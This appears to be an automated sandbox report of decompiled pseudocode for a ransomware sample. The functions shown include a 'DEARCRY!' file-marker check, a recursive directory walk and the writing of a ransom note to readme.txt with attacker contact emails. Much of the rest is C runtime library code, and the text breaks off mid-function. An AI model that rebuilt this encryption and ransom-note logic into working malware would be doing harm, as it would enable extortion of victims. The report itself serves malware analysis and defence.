                                                              				signed int _t88;
                                                              				signed int _t97;
                                                              				signed int _t98;
                                                              				signed int _t99;
                                                              				intOrPtr* _t100;
                                                              				void* _t101;
                                                              
                                                              				_t90 = __edx;
                                                              				if(_a8 == 0 || _a12 == 0) {
                                                              					L4:
                                                              					return 0;
                                                              				} else {
                                                              					_t100 = _a16;
                                                              					_t105 = _t100;
                                                              					if(_t100 != 0) {
                                                              						_t82 = _a4;
                                                              						__eflags = _t82;
                                                              						if(__eflags == 0) {
                                                              							goto L3;
                                                              						}
                                                              						_t63 = _t59 | 0xffffffff;
                                                              						_t90 = _t63 % _a8;
                                                              						__eflags = _a12 - _t63 / _a8;
                                                              						if(__eflags > 0) {
                                                              							goto L3;
                                                              						}
                                                              						_t97 = _a8 * _a12;
                                                              						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                                                              						_v8 = _t82;
                                                              						_v16 = _t97;
                                                              						_t81 = _t97;
                                                              						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                                                              							_v12 = 0x1000;
                                                              						} else {
                                                              							_v12 =  *(_t100 + 0x18);
                                                              						}
                                                              						__eflags = _t97;
                                                              						if(_t97 == 0) {
                                                              							L32:
                                                              							return _a12;
                                                              						} else {
                                                              							do {
                                                              								_t84 =  *(_t100 + 0xc) & 0x00000108;
                                                              								__eflags = _t84;
                                                              								if(_t84 == 0) {
                                                              									L18:
                                                              									__eflags = _t81 - _v12;
                                                              									if(_t81 < _v12) {
                                                              										_t68 = E00C6EC95(_t90, _t97,  *_v8, _t100); // executed
                                                              										__eflags = _t68 - 0xffffffff;
                                                              										if(_t68 == 0xffffffff) {
                                                              											L34:
                                                              											_t69 = _t97;
                                                              											L35:
                                                              											return (_t69 - _t81) / _a8;
                                                              										}
                                                              										_v8 = _v8 + 1;
                                                              										_t72 =  *(_t100 + 0x18);
                                                              										_t81 = _t81 - 1;
                                                              										_v12 = _t72;
                                                              										__eflags = _t72;
                                                              										if(_t72 <= 0) {
                                                              											_v12 = 1;
                                                              										}
                                                              										goto L31;
                                                              									}
                                                              									__eflags = _t84;
                                                              									if(_t84 == 0) {
                                                              										L21:
                                                              										__eflags = _v12;
                                                              										_t98 = _t81;
                                                              										if(_v12 != 0) {
                                                              											_t75 = _t81;
                                                              											_t90 = _t75 % _v12;
                                                              											_t98 = _t98 - _t75 % _v12;
                                                              											__eflags = _t98;
                                                              										}
                                                              										_push(_t98);
                                                              										_push(_v8);
                                                              										_push(E00C6D3F3(_t100)); // executed
                                                              										_t74 = E00C7335D(_t81, _t90, _t98, _t100, __eflags); // executed
                                                              										_t101 = _t101 + 0xc;
                                                              										__eflags = _t74 - 0xffffffff;
                                                              										if(_t74 == 0xffffffff) {
                                                              											L36:
                                                              											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                                                              											_t69 = _v16;
                                                              											goto L35;
                                                              										} else {
                                                              											_t88 = _t98;
                                                              											__eflags = _t74 - _t98;
                                                              											if(_t74 <= _t98) {
                                                              												_t88 = _t74;
                                                              											}
                                                              											_v8 = _v8 + _t88;
                                                              											_t81 = _t81 - _t88;
                                                              											__eflags = _t74 - _t98;
                                                              											if(_t74 < _t98) {
                                                              												goto L36;
                                                              											} else {
                                                              												L27:
                                                              												_t97 = _v16;
                                                              												goto L31;
                                                              											}
                                                              										}
                                                              									}
                                                              									_t77 = E00C6D021(_t90, _t100); // executed
                                                              									__eflags = _t77;
                                                              									if(_t77 != 0) {
                                                              										goto L34;
                                                              									}
                                                              									goto L21;
                                                              								}
                                                              								_t78 =  *(_t100 + 4);
                                                              								__eflags = _t78;
                                                              								if(__eflags == 0) {
                                                              									goto L18;
                                                              								}
                                                              								if(__eflags < 0) {
                                                              									_t48 = _t100 + 0xc;
                                                              									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                                                              									__eflags =  *_t48;
                                                              									goto L34;
                                                              								}
                                                              								_t99 = _t81;
                                                              								__eflags = _t81 - _t78;
                                                              								if(_t81 >= _t78) {
                                                              									_t99 = _t78;
                                                              								}
                                                              								E00C6B7A0(_t81, _t99, _t100,  *_t100, _v8, _t99);
                                                              								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                                                              								 *_t100 =  *_t100 + _t99;
                                                              								_t101 = _t101 + 0xc;
                                                              								_t81 = _t81 - _t99;
                                                              								_v8 = _v8 + _t99;
                                                              								goto L27;
                                                              								L31:
                                                              								__eflags = _t81;
                                                              							} while (_t81 != 0);
                                                              							goto L32;
                                                              						}
                                                              					}
                                                              					L3:
                                                              					_t61 = E00C6D8C9(_t105);
                                                              					_push(0);
                                                              					_push(0);
                                                              					_push(0);
                                                              					_push(0);
                                                              					_push(0);
                                                              					 *_t61 = 0x16;
                                                              					E00C6FB6E(_t90, 0, _t100);
                                                              					goto L4;
                                                              				}
                                                              			}





























                                                              APIs
                                                              • __flush.LIBCMT ref: 00C6AD05
                                                              • __fileno.LIBCMT ref: 00C6AD25
                                                              • __locking.LIBCMT ref: 00C6AD2C
                                                              • __flsbuf.LIBCMT ref: 00C6AD57
                                                                • Part of subcall function 00C6D8C9: __getptd_noexit.LIBCMT ref: 00C6D8C9
                                                                • Part of subcall function 00C6FB6E: __decode_pointer.LIBCMT ref: 00C6FB79
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                              • String ID:
                                                              • API String ID: 3240763771-0
                                                              • Opcode ID: af10f783225c8cfc59b5e0970ee8d4778b09fd3305b4cbaa056fec7ae8dbeaa3
                                                              • Instruction ID: 13432e7231fa3c019a7fdfa98b6bafa8d8dc4d987af1c7d3a1e04f80b44a0671
                                                              • Opcode Fuzzy Hash: af10f783225c8cfc59b5e0970ee8d4778b09fd3305b4cbaa056fec7ae8dbeaa3
                                                              • Instruction Fuzzy Hash: AA41E631A00604EFDB389F69C8C05AEBBB6EF80361F248529E466A7550E771DF41DF52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 95%
                                                              			E00B910F6(void* __eax, intOrPtr __ebx, void* __ecx, intOrPtr __esi, void* __ebp, char _a4, char _a8, char _a12, char _a276, signed int _a532) {
                                                              				void* _t14;
                                                              				void* _t19;
                                                              				void* _t20;
                                                              				void* _t21;
                                                              				intOrPtr _t22;
                                                              				void* _t24;
                                                              				intOrPtr _t25;
                                                              				void* _t26;
                                                              				signed int _t33;
                                                              				intOrPtr _t34;
                                                              				intOrPtr _t35;
                                                              				void* _t37;
                                                              				signed int _t49;
                                                              
                                                              				_t35 = __esi;
                                                              				_t26 = __ecx;
                                                              				_t25 = __ebx;
                                                              				_t14 = __eax;
                                                              				while(1) {
                                                              					_t32 =  *((intOrPtr*)(_t37 + _t26 + 0x14));
                                                              					_t3 = _t26 + "DEARCRY!"; // 0x52414544
                                                              					if( *((intOrPtr*)(_t37 + _t26 + 0x14)) !=  *_t3) {
                                                              						break;
                                                              					}
                                                              					_t14 = _t14 - 4;
                                                              					_t26 = _t26 + 4;
                                                              					if(_t14 >= 4) {
                                                              						continue;
                                                              					} else {
                                                              						_t19 = E00C6AC24( &_a4, 1, 4, _t35);
                                                              						_t37 = _t37 + 0x10;
                                                              						if(_t19 == 4 && _a4 == 0x100) {
                                                              							_t20 = E00C6AC24( &_a276, 1, 0x100, _t35);
                                                              							_t37 = _t37 + 0x10;
                                                              							if(_t20 == _a4) {
                                                              								_t32 =  &_a8;
                                                              								_t21 = E00C6AC24( &_a8, 1, 4, _t35);
                                                              								_t37 = _t37 + 0x10;
                                                              								if(_t21 == 4) {
                                                              									_t22 = _a8;
                                                              									if(_t22 == 3 || _t22 == 4) {
                                                              										_t24 = E00C6AC24( &_a12, 1, 8, _t35);
                                                              										_t37 = _t37 + 0x10;
                                                              										_t12 = _t24 == 8;
                                                              										_t49 = _t12;
                                                              										_t33 = 0 | _t12;
                                                              									}
                                                              								}
                                                              							}
                                                              						}
                                                              						break;
                                                              					}
                                                              				}
                                                              				E00C6B1A7(_t25, _t32, _t33, _t35, _t49); // executed
                                                              				_t34 = _t35;
                                                              				return E00C69C26(_t33, _t25, _a532 ^ _t37 + 0x00000004, _t32, _t34, _t35);
                                                              			}
















                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: __fread_nolock
                                                              • String ID:
                                                              • API String ID: 2638373210-0
                                                              • Opcode ID: 9b11bf86685b95dbec446e58e2f3c31ccfabd4ffce7e0c0baec411e74dd20759
                                                              • Instruction ID: cc68dfa22c86952bbc5a4adc8053b3d4e92ef031278dfacec306ae6b418ab6c7
                                                              • Opcode Fuzzy Hash: 9b11bf86685b95dbec446e58e2f3c31ccfabd4ffce7e0c0baec411e74dd20759
                                                              • Instruction Fuzzy Hash: F811017160430137FE34EA248CC6FBE32A5EB90714F140C79F319E6182D676E981D6A3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00C6A686(CHAR* _a4) {
                                                              				int _t2;
                                                              				long _t3;
                                                              
                                                              				_t2 = DeleteFileA(_a4); // executed
                                                              				if(_t2 != 0) {
                                                              					_t3 = 0;
                                                              				} else {
                                                              					_t3 = GetLastError();
                                                              				}
                                                              				if(_t3 == 0) {
                                                              					return 0;
                                                              				} else {
                                                              					return E00C6D8EF(_t3) | 0xffffffff;
                                                              				}
                                                              			}





                                                              APIs
                                                              • DeleteFileA.KERNELBASE(?,?,00B91587,?,?), ref: 00C6A68E
                                                              • GetLastError.KERNEL32 ref: 00C6A698
                                                              • __dosmaperr.LIBCMT ref: 00C6A6A7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: DeleteErrorFileLast__dosmaperr
                                                              • String ID:
                                                              • API String ID: 1545401867-0
                                                              • Opcode ID: 12814c5c03df854fa9355598df97868b5493a35c863af50142ce98b608562ccc
                                                              • Instruction ID: bb52054d798580b3a689980490b9bdd4c05f1562092ac29f0e4ff7af605391b6
                                                              • Opcode Fuzzy Hash: 12814c5c03df854fa9355598df97868b5493a35c863af50142ce98b608562ccc
                                                              • Instruction Fuzzy Hash: B7D05E31244109678B641AB7EC4D71F3A9C9B803707285560F42DD50A1EE21CC519A55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 70%
                                                              			E00C6AB8E(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                              				intOrPtr _t19;
                                                              				intOrPtr _t22;
                                                              				void* _t33;
                                                              				void* _t34;
                                                              
                                                              				_t30 = __edi;
                                                              				_t29 = __edx;
                                                              				_push(0xc);
                                                              				_push(0xcbfa20);
                                                              				E00C70838(__ebx, __edi, __esi);
                                                              				 *((intOrPtr*)(_t33 - 0x1c)) = 0;
                                                              				if( *((intOrPtr*)(_t33 + 0x10)) == 0 ||  *((intOrPtr*)(_t33 + 0x14)) == 0) {
                                                              					L6:
                                                              					_t19 = 0;
                                                              				} else {
                                                              					if( *((intOrPtr*)(_t33 + 0x18)) != 0) {
                                                              						E00C6A4BD( *((intOrPtr*)(_t33 + 0x18)));
                                                              						 *((intOrPtr*)(_t33 - 4)) = 0;
                                                              						_t22 = E00C6A984(__edx,  *((intOrPtr*)(_t33 + 8)),  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)),  *((intOrPtr*)(_t33 + 0x14)),  *((intOrPtr*)(_t33 + 0x18))); // executed
                                                              						 *((intOrPtr*)(_t33 - 0x1c)) = _t22;
                                                              						 *((intOrPtr*)(_t33 - 4)) = 0xfffffffe;
                                                              						E00C6AC1A();
                                                              						_t19 =  *((intOrPtr*)(_t33 - 0x1c));
                                                              					} else {
                                                              						_t41 =  *((intOrPtr*)(_t33 + 0xc)) - 0xffffffff;
                                                              						if( *((intOrPtr*)(_t33 + 0xc)) != 0xffffffff) {
                                                              							E00C6BB40(__edi,  *((intOrPtr*)(_t33 + 8)), 0,  *((intOrPtr*)(_t33 + 0xc)));
                                                              							_t34 = _t34 + 0xc;
                                                              						}
                                                              						 *((intOrPtr*)(E00C6D8C9(_t41))) = 0x16;
                                                              						_push(0);
                                                              						_push(0);
                                                              						_push(0);
                                                              						_push(0);
                                                              						_push(0);
                                                              						E00C6FB6E(_t29, _t30, 0);
                                                              						goto L6;
                                                              					}
                                                              				}
                                                              				return E00C7087D(_t19);
                                                              			}








                                                              APIs
                                                              Similarity
                                                              • API ID: __lock_file_memset
                                                              • String ID:
                                                              • API String ID: 26237723-0
                                                              • Opcode ID: 2303dc44c5ffb67f7c0826a06f6f34f8165792c633cec79257e5db0c6f386449
                                                              • Instruction ID: f257968001c470bf0457bf03cf99589b74162e0785a61c7c521db00dff283572
                                                              • Opcode Fuzzy Hash: 2303dc44c5ffb67f7c0826a06f6f34f8165792c633cec79257e5db0c6f386449
                                                              • Instruction Fuzzy Hash: AD015E71C01219EBCF31BFA4DC4289EBB71AF44750F108165F829261A2D7358A62FFD2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 66%
                                                              			E00C6B1A7(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                              				signed int _t18;
                                                              				signed int _t20;
                                                              				intOrPtr _t31;
                                                              				void* _t32;
                                                              				intOrPtr _t36;
                                                              
                                                              				_push(0xc);
                                                              				_push(0xcbfa80);
                                                              				E00C70838(__ebx, __edi, __esi);
                                                              				 *(_t32 - 0x1c) =  *(_t32 - 0x1c) | 0xffffffff;
                                                              				_t31 =  *((intOrPtr*)(_t32 + 8));
                                                              				_t36 = _t31;
                                                              				_t37 = _t36 != 0;
                                                              				if(_t36 != 0) {
                                                              					__eflags =  *(_t31 + 0xc) & 0x00000040;
                                                              					if(( *(_t31 + 0xc) & 0x00000040) == 0) {
                                                              						E00C6A4BD(_t31);
                                                              						 *((intOrPtr*)(_t32 - 4)) = 0;
                                                              						_t18 = E00C6B130(__edx, _t31); // executed
                                                              						 *(_t32 - 0x1c) = _t18;
                                                              						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
                                                              						E00C6B21B(_t31);
                                                              					} else {
                                                              						 *(_t31 + 0xc) = 0;
                                                              					}
                                                              					_t20 =  *(_t32 - 0x1c);
                                                              				} else {
                                                              					 *((intOrPtr*)(E00C6D8C9(_t37))) = 0x16;
                                                              					_push(0);
                                                              					_push(0);
                                                              					_push(0);
                                                              					_push(0);
                                                              					_push(0);
                                                              					_t20 = E00C6FB6E(__edx, 0, _t31) | 0xffffffff;
                                                              				}
                                                              				return E00C7087D(_t20);
                                                              			}









                                                              APIs
                                                                • Part of subcall function 00C6D8C9: __getptd_noexit.LIBCMT ref: 00C6D8C9
                                                                • Part of subcall function 00C6FB6E: __decode_pointer.LIBCMT ref: 00C6FB79
                                                              • __lock_file.LIBCMT ref: 00C6B1F7
                                                                • Part of subcall function 00C6A4BD: __lock.LIBCMT ref: 00C6A4E2
                                                              • __fclose_nolock.LIBCMT ref: 00C6B201
                                                              Similarity
                                                              • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                              • String ID:
                                                              • API String ID: 717694121-0
                                                              • Opcode ID: 3ea893f10d4dc1e154e1fea62144d84b55a92b9a63abebd60ba4517ed499d1ca
                                                              • Instruction ID: 9ea9861d2e914ffd6918cd5356da4e950805a06f9eb41f673bf2d96fd409915c
                                                              • Opcode Fuzzy Hash: 3ea893f10d4dc1e154e1fea62144d84b55a92b9a63abebd60ba4517ed499d1ca
                                                              • Instruction Fuzzy Hash: 7DF0C870C00604DAC730BB6A9C8565E7BE05F45330F20C249F479D61C1CB384A43AB55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 58%
                                                              			E00BA3430(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                              				void* __edi;
                                                              				intOrPtr* _t5;
                                                              				void* _t6;
                                                              				void* _t10;
                                                              				void* _t12;
                                                              				void* _t15;
                                                              
                                                              				_t10 = __ebx;
                                                              				_t5 =  *0xcc1284; // 0xba33f0
                                                              				if(_t5 == 0 || _t5 == E00BA33F0) {
                                                              					_t14 = _a4;
                                                              					if(_a4 > 0) {
                                                              						 *0xcc1280 = 0; // executed
                                                              						_t6 = E00C6A294(_t10, _t12, _t14, _t14); // executed
                                                              						goto L6;
                                                              					} else {
                                                              						return 0;
                                                              					}
                                                              				} else {
                                                              					_t14 = _a4;
                                                              					_t6 =  *_t5(_a4, _a8, _a12);
                                                              					L6:
                                                              					_t15 = _t6;
                                                              					if(_t15 != 0) {
                                                              						E00C6BB40(_t14, _t15, 0, _t14);
                                                              					}
                                                              					return _t15;
                                                              				}
                                                              			}










                                                              APIs
                                                              Similarity
                                                              • API ID: _malloc_memset
                                                              • String ID:
                                                              • API String ID: 4137368368-0
                                                              • Opcode ID: 643b49249a2aa553970bd9cb13775a007ee615f8f6cc6a237d4404282ba67e61
                                                              • Instruction ID: dff75b0445e79c0ce0385725576617e4ad91e2f4ac3c61f690cc105fffd2efbe
                                                              • Opcode Fuzzy Hash: 643b49249a2aa553970bd9cb13775a007ee615f8f6cc6a237d4404282ba67e61
                                                              • Instruction Fuzzy Hash: 0FF0B4736082112BD6219A19BC41F5FA3E4EBC7F60F094159F804D7300DB30DD4686B2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 85%
                                                              			E00B91997(signed int __edx) {
                                                              				int _t91;
                                                              				intOrPtr* _t92;
                                                              				signed int _t93;
                                                              				intOrPtr* _t94;
                                                              				signed int _t102;
                                                              				intOrPtr* _t103;
                                                              				signed int _t105;
                                                              				signed int _t106;
                                                              				signed int _t111;
                                                              				signed int _t112;
                                                              				intOrPtr* _t113;
                                                              				signed int _t114;
                                                              				char* _t117;
                                                              				signed int _t118;
                                                              				char _t121;
                                                              				intOrPtr* _t122;
                                                              				signed int _t125;
                                                              				intOrPtr* _t126;
                                                              				signed int _t127;
                                                              				intOrPtr* _t128;
                                                              				signed int _t132;
                                                              				signed int _t134;
                                                              				intOrPtr* _t137;
                                                              				signed int _t139;
                                                              				signed int _t140;
                                                              				intOrPtr* _t142;
                                                              				void* _t143;
                                                              				signed int _t146;
                                                              				intOrPtr* _t151;
                                                              				void* _t152;
                                                              				char _t155;
                                                              				intOrPtr* _t156;
                                                              				intOrPtr _t160;
                                                              				signed int _t167;
                                                              				signed int _t168;
                                                              				signed int _t170;
                                                              				signed int _t171;
                                                              				signed int _t172;
                                                              				signed int _t173;
                                                              				signed int _t174;
                                                              				signed int _t176;
                                                              				signed int _t178;
                                                              				signed int _t179;
                                                              				signed int _t181;
                                                              				char _t182;
                                                              				intOrPtr _t183;
                                                              				signed int _t184;
                                                              				signed int _t186;
                                                              				void* _t188;
                                                              				void* _t189;
                                                              				void* _t190;
                                                              				void* _t191;
                                                              				void* _t194;
                                                              				char* _t198;
                                                              				void* _t201;
                                                              				void* _t202;
                                                              				signed int _t203;
                                                              				signed int _t204;
                                                              				char** _t206;
                                                              				signed int _t207;
                                                              				void* _t208;
                                                              				signed int _t209;
                                                              				intOrPtr _t212;
                                                              				intOrPtr* _t213;
                                                              				intOrPtr _t214;
                                                              				signed int _t215;
                                                              				intOrPtr _t217;
                                                              				void* _t221;
                                                              				void* _t222;
                                                              				void* _t223;
                                                              				void* _t228;
                                                              
                                                              				_t187 = __edx;
                                                              				_t217 =  *((intOrPtr*)(_t215 - 0x18));
                                                              				 *((intOrPtr*)(_t215 - 4)) = 0xfffffffe;
                                                              				_t213 =  *((intOrPtr*)(_t215 - 0x160c));
                                                              				while(1) {
                                                              					L75:
                                                              					_t201 =  *(_t215 - 0x1608);
                                                              					_t91 = FindNextFileA(_t201, _t215 - 0x15f0); // executed
                                                              					if(_t91 == 0) {
                                                              						break;
                                                              					}
                                                              					__eflags =  *(_t215 - 0x15f0) & 0x00000010;
                                                              					if(( *(_t215 - 0x15f0) & 0x00000010) != 0) {
                                                              						__eflags =  *(_t215 - 0x15c4) - 0x2e;
                                                              						if( *(_t215 - 0x15c4) != 0x2e) {
                                                              							_t92 = _t213;
                                                              							_t188 = _t92 + 1;
                                                              							do {
                                                              								_t167 =  *_t92;
                                                              								_t92 = _t92 + 1;
                                                              								__eflags = _t167;
                                                              							} while (_t167 != 0);
                                                              							_t93 = _t92 - _t188;
                                                              							__eflags = _t93;
                                                              							_t187 = _t93;
                                                              							_t94 = _t215 - 0x15c4;
                                                              							_t49 = _t94 + 1; // 0x2f
                                                              							_t202 = _t49;
                                                              							do {
                                                              								_t162 =  *_t94;
                                                              								_t94 = _t94 + 1;
                                                              								__eflags = _t162;
                                                              							} while (_t162 != 0);
                                                              							__eflags = _t94 - _t202 + _t187 - 0x514;
                                                              							if(_t94 - _t202 + _t187 < 0x514) {
                                                              								E00C6BB40(_t202, _t215 - 0xf98, 0, 0x514);
                                                              								E00C6BB40(_t202, _t215 - 0x568, 0, 0x514);
                                                              								_push(_t215 - 0x15c4);
                                                              								E00C69C35(_t202, _t213, _t215 - 0xf98, "%s%s", _t213);
                                                              								_t217 = _t217 + 0x28;
                                                              								_t102 = 0;
                                                              								do {
                                                              									_t178 =  *((intOrPtr*)(_t215 + _t102 - 0xf98));
                                                              									 *((char*)(_t215 + _t102 - 0x568)) = _t178;
                                                              									_t102 = _t102 + 1;
                                                              									__eflags = _t178;
                                                              								} while (_t178 != 0);
                                                              								_t203 = 0;
                                                              								__eflags = 0;
                                                              								_t103 = _t215 - 0x568;
                                                              								_t187 = _t103 + 1;
                                                              								do {
                                                              									_t179 =  *_t103;
                                                              									_t103 = _t103 + 1;
                                                              									__eflags = _t179;
                                                              								} while (_t179 != 0);
                                                              								__eflags = _t103 != _t187;
                                                              								if(_t103 != _t187) {
                                                              									do {
                                                              										_t121 = E00C6AFFA( *((char*)(_t215 + _t203 - 0x568)));
                                                              										_t217 = _t217 + 4;
                                                              										 *((char*)(_t215 + _t203 - 0x568)) = _t121;
                                                              										_t203 = _t203 + 1;
                                                              										__eflags = _t203;
                                                              										_t122 = _t215 - 0x568;
                                                              										_t187 = _t122 + 1;
                                                              										do {
                                                              											_t186 =  *_t122;
                                                              											_t122 = _t122 + 1;
                                                              											__eflags = _t186;
                                                              										} while (_t186 != 0);
                                                              										__eflags = _t203 - _t122 - _t187;
                                                              									} while (_t203 < _t122 - _t187);
                                                              								}
                                                              								_t204 = 0;
                                                              								__eflags =  *0xec9fb0;
                                                              								if( *0xec9fb0 != 0) {
                                                              									_t117 = 0xec9fb0;
                                                              									while(1) {
                                                              										_t187 = _t215 - 0x568;
                                                              										_t118 = E00C6A360(_t215 - 0x568, _t117);
                                                              										_t217 = _t217 + 8;
                                                              										__eflags = _t118;
                                                              										if(_t118 != 0) {
                                                              											break;
                                                              										}
                                                              										_t204 = _t204 + 1;
                                                              										_t117 = 0xec9fb0 + _t204 * 0xff;
                                                              										__eflags =  *_t117;
                                                              										if( *_t117 != 0) {
                                                              											continue;
                                                              										} else {
                                                              										}
                                                              										goto L63;
                                                              									}
                                                              									 *((char*)(_t215 - 0x15f1)) = 0;
                                                              								}
                                                              								L63:
                                                              								_t206 = _t215 - 0xf97;
                                                              								__eflags = _t206;
                                                              								do {
                                                              									_t105 = _t206[0];
                                                              									_t206 =  &(_t206[0]);
                                                              									__eflags = _t105;
                                                              								} while (_t105 != 0);
                                                              								_t162 = "\\"; // 0x5c
                                                              								 *_t206 = _t162;
                                                              								__eflags =  *((intOrPtr*)(_t215 - 0x15f1)) - _t105;
                                                              								if( *((intOrPtr*)(_t215 - 0x15f1)) != _t105) {
                                                              									_t106 = E00C6A360(_t215 - 0x568, "DESKTOP");
                                                              									_t228 = _t217 + 8;
                                                              									__eflags = _t106;
                                                              									if(_t106 != 0) {
                                                              										_t111 = _t215 - 0x567;
                                                              										__eflags = _t111;
                                                              										do {
                                                              											_t181 =  *(_t111 + 1);
                                                              											_t111 = _t111 + 1;
                                                              											__eflags = _t181;
                                                              										} while (_t181 != 0);
                                                              										_t182 = "/readme.txt"; // 0x6165722f
                                                              										 *_t111 = _t182;
                                                              										_t198 = M00CBF7C8; // 0x2e656d64
                                                              										 *((intOrPtr*)(_t111 + 4)) = _t198;
                                                              										_t183 =  *0xcbf7cc; // 0x747874
                                                              										 *((intOrPtr*)(_t111 + 8)) = _t183;
                                                              										_t112 = L00C6A96D(_t215 - 0x568, "w+"); // executed
                                                              										_t228 = _t228 + 8;
                                                              										_t207 = _t112;
                                                              										__eflags = _t207;
                                                              										if(_t207 != 0) {
                                                              											_t113 = 0xdc9fb0;
                                                              											do {
                                                              												_t184 =  *_t113;
                                                              												_t113 = _t113 + 1;
                                                              												__eflags = _t184;
                                                              											} while (_t184 != 0);
                                                              											_t114 = _t113 - 0xdc9fb1;
                                                              											__eflags = _t114;
                                                              											_push(_t207);
                                                              											_push(_t114);
                                                              											_push(1);
                                                              											_push("Your file has been encrypted!						 If you want to decrypt, please contact us.						 konedieyp@airmail.cc or uenwonken@memail.com						 And please send me the following hash!						 d37fc1eabc6783a418d23a8d2ba5db5a");
                                                              											E00C6ADA3(_t159, 0xdc9fb1, _t207, _t213, __eflags);
                                                              											_push(_t207); // executed
                                                              											E00C6B1A7(_t159, 0xdc9fb1, _t207, _t213, __eflags); // executed
                                                              											_t228 = _t228 + 0x14;
                                                              										}
                                                              									}
                                                              									_t162 = _t215 - 0xf98;
                                                              									_t187 =  *(_t215 - 0x1600);
                                                              									E00B91640( *(_t215 - 0x1600), _t215 - 0xf98,  *(_t215 + 0x10),  *((intOrPtr*)(_t215 + 0x14)),  *((intOrPtr*)(_t215 - 0x15f8)),  *((intOrPtr*)(_t215 - 0x15fc))); // executed
                                                              									_t217 = _t228 + 0x18;
                                                              								}
                                                              								 *((char*)(_t215 - 0x15f1)) = 1;
                                                              							}
                                                              						}
                                                              					} else {
                                                              						_t125 = E00C6AE30(_t162, _t215 - 0x15c4, 0x2e);
                                                              						_t217 = _t217 + 8;
                                                              						_t159 = _t125;
                                                              						__eflags = _t159;
                                                              						if(_t159 != 0) {
                                                              							_t126 = _t213;
                                                              							_t189 = _t126 + 1;
                                                              							do {
                                                              								_t168 =  *_t126;
                                                              								_t126 = _t126 + 1;
                                                              								__eflags = _t168;
                                                              							} while (_t168 != 0);
                                                              							_t127 = _t126 - _t189;
                                                              							__eflags = _t127;
                                                              							_t187 = _t127;
                                                              							_t128 = _t215 - 0x15c4;
                                                              							_t208 = _t128 + 1;
                                                              							do {
                                                              								_t162 =  *_t128;
                                                              								_t128 = _t128 + 1;
                                                              								__eflags = _t162;
                                                              							} while (_t162 != 0);
                                                              							__eflags = _t128 - _t208 + _t187 - 0x514;
                                                              							if(_t128 - _t208 + _t187 < 0x514) {
